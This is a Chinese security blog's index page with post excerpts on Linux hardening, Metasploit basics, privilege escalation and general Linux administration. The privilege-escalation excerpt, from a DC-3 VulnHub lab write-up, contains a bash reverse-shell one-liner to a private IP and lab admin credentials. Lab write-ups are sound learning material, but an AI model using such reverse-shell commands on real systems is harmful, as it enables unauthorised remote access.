Linux安全加固以及基线检查

一、账号管理1、口令锁定策略基线检查:查看文件more /etc/pam.d/password-auth判定条件:是否存在以下内容auth required pam_tally2.so deny=5 onerr=fail unlock_time=300 even_deny_root=5 root_unlock_time=600安全加固:(1)执行备份(2)修改策略,编辑文件,增加以上内容。ps:==如果要对root用户生效,请在内容后继续添加:==even_deny_root=5 root_unlocak_time=600查询被锁定的账号:pam_tally2 -u手动解锁某个被锁定账号:pam_tally2 -u 用户名 -r2、口令生存期基线检查:查看文件more /etc/login.defs判定条件:检查参数值是否满足要求PASS_MAX_DAYS用户密码最长使用天数不大于90 PASS_WARN_AGE用户密码到期提前提醒天数为7安全加固:(1)执行备份(2)修改策略,编辑文件,增加以下内容,如果存在则修改。PASS_MAX_DAYS 90 PASS_WARN_AGE 7执行

信息安全学习·网安·生命在于学习 · 2023-03-14 · 137 人浏览
Linux安全加固以及基线检查

MSF初体验(一)

==注意:本篇文章仅用于学习笔记记录与交流,不得用于其他违规用途。==一、什么是MSF框架Metasploit就是一个漏洞利用框架,全称是The Metasploit Framework,简称MSF(美少妇),使用ruby语言编写的,语法类似python。Metasploit是一个免费的、可下载的框架,通过它可以很容易的获取、开发并对计算机软件漏洞实施攻击,它本身附带数百个已知软件漏洞的专业级漏洞利用工具。当 H.D. Moore 在 2003 年发布 Metasploit 时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit 团队一直都在努力开发各种攻击工具,并将它们 贡献给所有 Metasploit 用户。访问官网:https://www.metasploit.com/关于版本社区版:集成在 kali 系统中,目前基于社区力量维护。早期版本需要先启动数据库再启动 MSF,从msf5版本以后已经集成到 msf 里面了,可

Linux学习·网安·生命在于学习 · 2023-01-02 · 190 人浏览
MSF初体验(一)

Linux提权

本篇文章仅用于学习记录,不得用于其他违规用途。一、内核漏洞提权1、常规查找查看内核版本信息uname -a uname -r查看系统发行版本cat /etc/issue cat /etc/*-release Ubuntu 16.04 4.4.0-21-generic搜索该版本漏洞,把对应版本的文件上传到服务器编译执行searchsploit Ubuntu16.04 searchsploit -u #更新数据库2、Ubuntu 16.04提权DC-3 靶机做实验 , 开局一个shell http://192.168.0.189/templates/beez3/error.php /bin/bash -i >& /dev/tcp/192.168.101.48/5656 0>&1 DC-3下载地址 https://www.vulnhub.com/entry/dc-32,312/ 后台 http://192.168.101.123/administrator/ admin snoopy发现是ubuntu16.04内核版本是4.4.0-21的,直接通过kali里面

信息安全学习·网安·生命在于学习 · 2022-04-12 · 81 人浏览
Linux提权

Linux学习日记(五)目录结构

目录结构及主要内容“/”根目录部分有以下子目录一、/usr目录这个目录包含所有的命令、程序库、文档和其他文件。这些文件在正常操作中是不会被改变的,这个目录也包含你的Linux发行版本的主要的应用程序。二、/var目录这个目录包含在正常操作中被改变的文件:假脱机文件、记录文件、加锁文件、临时文件和页格式化文件等。这个目录中存放着那些不断在扩充着的东西,为了保持/usr的相对稳定,那些经常被修改的目录可以放在这个目录下,实际上许多系统管理员都是这样干的,顺带说一下系统的日志文件就在/var/log目录中。三、/home目录这个目录包含用户的文件:参数设置文件、个性化文件、文档、数据、EMAIL、缓存数据等。这个目录在系统省级时应该保留。四、/proc目录这个目录包含整个虚幻的文件,他们实际上并不存在磁盘上,也不占用任何空间,当查看这些文件时,实际上是在访问存在内存中的信息,这些信息用于访问系统。五、/bin目录这个目录为系统启动时需要的执行文件,这些文件可以被普通用户使用。六、/sbin目录系统执行文件,这些文件不打算被普通用户使用。(普通用户仍然可以使用他们,但要指定目录。)七、/etc

Linux学习·网安·生命在于学习 · 2022-04-01 · 136 人浏览

Linux学习日记(七)时间管理

一、Linux时间介绍Linux时钟分为系统时钟(System Clock)和硬件(Real Time Clock,简称RTC)时钟。系统时钟是指当前Linux Kernel中的时钟,而硬件时钟则是主板上由电池供电的时钟,这个硬件时钟可以在BIOS中进行设置,当Linux启动时,硬件时钟会去读取系统时钟的设置,然后系统设置就会独立与硬件运作。 Linu中的所有命令(包括函数)都是采用的系统时钟设置,在Linux中,用于时钟查看和设置的命令主要有date、hwclock和clock,其中,clock和hwclock用法接近,只用一个 就行,只不过clock命令除了支持x86硬件体系外,还支持Alpha硬件体系。 二、Linux时间设置命令1、date语法格式:date [-u] [-d datestr] [-s datestr] [--utc] [--universal] [--date=datestr] [--set=datestr] [--help][--version] [+FORMAT] [MMDDhhmm[[CC]YY][.ss]]==说明:可以用来设置系统日期与实践,只有管理

Linux学习·网安·生命在于学习 · 2022-03-31 · 145 人浏览

Linux学习日记(六)软件安装

一、RPMROM软件的安装、删除、更新只有root权限才能使用,对于查询功能任何用户都可以操作,如果普通用户拥有安装目录的权限,也可以进行安装,首先初始化rpm数据库,通过rpm命令查询一个rpm包是否安装了,也是要通过rpm数据库来完成的,所以我们要经常用下面的两个命令来初始化rpm数据库:[root@localhost]# rpm --initdb [root@localhost]# rpm --rebuilddb ==注意:这两个参数是极为有用的,有时候RPM系统出来问题,不能安装和查询,大多是这里出了问题。/var/lib/rpm目录下的数据库记录所有软件的升级需求,记录已经安装的所有软件,数字证书记录等,这个目录下的文件非常重要。==1、RPM软件包管理的查询功能命令格式:rpm {-q|--query} [select-options] [query-options]==RPM的查询功能极为强大,是极为重要的功能之一。==(1)查询系统已经安装的软件语法:rpm -q 软件名举例子:[root@Kelemao /]# rpm -q python package python

Linux学习·网安·生命在于学习 · 2022-03-30 · 108 人浏览

Linux学习日记(四)用户管理

一、用户和用户组操作命令1、ID2、Fingerfinger命令是linux下的一个系统管理命令,具体命令的语法格式为finger[参数],它主要有一个功能,finger命令能够去寻找并且显示指定账号的用户有关信息,以及本地与远程主机的用户也都可以,账号名称是没有大小写的差别的。3、Pwck检查/etc/passwd 配置文件内的信息与实际主文件夹是否存在,还可比较/etc/passwd 和/etc/shadow 的信息是否一致,另外如果/etc/passwd 中的数据字段错误也会提示。4、Grpck使用grpck命令可以检查组群信息的完整性。它检查/etc/group和/etc/gshadow文件中具有正确格式并包含有效数据的所有条目。5、Groups主要用于打印指定用户所在组的名称6、newgrpLinux newgrp 命令用于登入另一个群组。 newgrp 指令类似 login 指令,当它是以相同的帐号,另一个群组名称,再次登入系统。7、useradduseradd命令用于建立用户帐号。如果在没有-D选项的情况下调用,useradd命令将使用命令行上指定的值加上系统中的默认值创

网安 · 2022-03-15 · 119 人浏览
Linux学习日记(四)用户管理

Linux学习日记(三)磁盘管理

一、所用环境本机windows远程ssh登录linux云服务器。二、学习开始1、文件系统配置文件/etc/filesystems:系统指定的测试挂载文件系统类型/proc/filesystems:Linux 系统已经加载的文件系统类型/lib/modules/2.6.18-274.el5/kernel/fs/ 文件系统类型的驱动所在目录/etc/fstab/etc/mtab2、文件类型的颜色linux文件颜色的含义:蓝色代表目录,绿色代表可执行文件,红色表示压缩文件,浅蓝色表示链接文件,灰色表示其他文件,红色闪烁表示链接的文件有问题了,黄色表示设备文件。蓝色文件——目录白色文件——一般性文件,如文本文件,配置文件,源码文件浅蓝色文件——链接文件,主要是使用ln命令建立的文件绿色文件——可执行文件,可执行的程序红色文件——压缩文件或者包文件Linux下用字符表示的文件类型-:普通文件d:目录文件l:链接文件b:块设备文件c:字符设备文件p:管道文件3、文件系统操作命令(1)df:列出文件系统的整体磁盘使用情况[root@centos57 ~]# df -h文件系统 容量 已用 可用 已用

Linux学习·网安·生命在于学习 · 2022-02-14 · 113 人浏览
Linux学习日记(三)磁盘管理

Linux学习笔记(八)启动引导

注意:本篇文章仅用于自我学习Linux系统的操作,笔记记录,不得用于其他违规用途。一、Linux的启动流程1、BIOS自检2、启动GRUB/LILO3、运行Linux kernel并检测硬件4、挂载根文件系统5、运行Linux系统的第一个进程init(其PID永远为1,是所有其他进程的父进程)6、init读取系统引导配置文件 /etc/inittab中的信息进行初始化7、执行系统初始化脚本-/etc/rc.d/rc.sysinit,执行系统初始化(包括很多内容)8、根据指定的运行级别来运行服务器脚本程序,再执行脚本 /etc/rc.d/rc.local9、运行一些其他的特别服务,一般为/sbin/mingetty和/etc/X11/prefdm10、Linux控制台(console)提示用户输入用户名、密码进行登录。总结:BIOS初始化→检查外围设备→检查启动设备→读取MBR二、在Linux中常用的启动引导工具:grub和lilo在LInux和Windows两系统并存时就需要安装GRUB,GRUB被广泛的用于替代lilo,GRUB支持在启动时使用命令行模式,支持md5加密保护,还可以从

Linux学习·网安·生命在于学习 · 2022-02-02 · 98 人浏览
Linux学习笔记(八)启动引导

Linux学习日记(一)常用命令

一、所用环境本机windows远程ssh登录linux云服务器。二、学习开始1、终端快捷键Ctrl + a/Home 切换到命令行开始 Ctrl + e/End 切换到命令行末尾 Ctrl + l 清除屏幕内容,效果等同于 clear Ctrl + u 清除剪切光标之前的内容 Ctrl + k 剪切清除光标之后的内容 Ctrl + y 粘贴刚才所删除的字符 Ctrl + r 在历史命令中查找 (这个非常好用,输入关键字就调出以前的命令了) Ctrl + c 终止命令 ctrl + o 重复执行命令 Ctrl + d 退出 shell,logout Ctrl + z 转入后台运行,但在当前用户退出后就会终止 Ctrl + t 颠倒光标所在处及其之前的字符位置,并将光标移动到下一个字符 Alt + t 交换当前与以前单词的位置 Alt + d 剪切光标之后的词 Ctrl+w 剪切光标所在处之前的一个词(以空格、标点等为分隔符) Ctrl+(x u) 按住 Ctrl 的同时再先后按 x 和 u,撤销刚才的操作 Ctrl+s 锁住终端 Ctrl+q 解锁终端 !! 重复执行最后一条命令 his

Linux学习·网安·生命在于学习 · 2022-01-21 · 117 人浏览
Linux学习日记(一)常用命令
2019 - 2025 赛博保安日志. All Rights Reserved.
Theme Jasmine by Kent Liao 京ICP备2023023335号-2京公网安备11010802044340号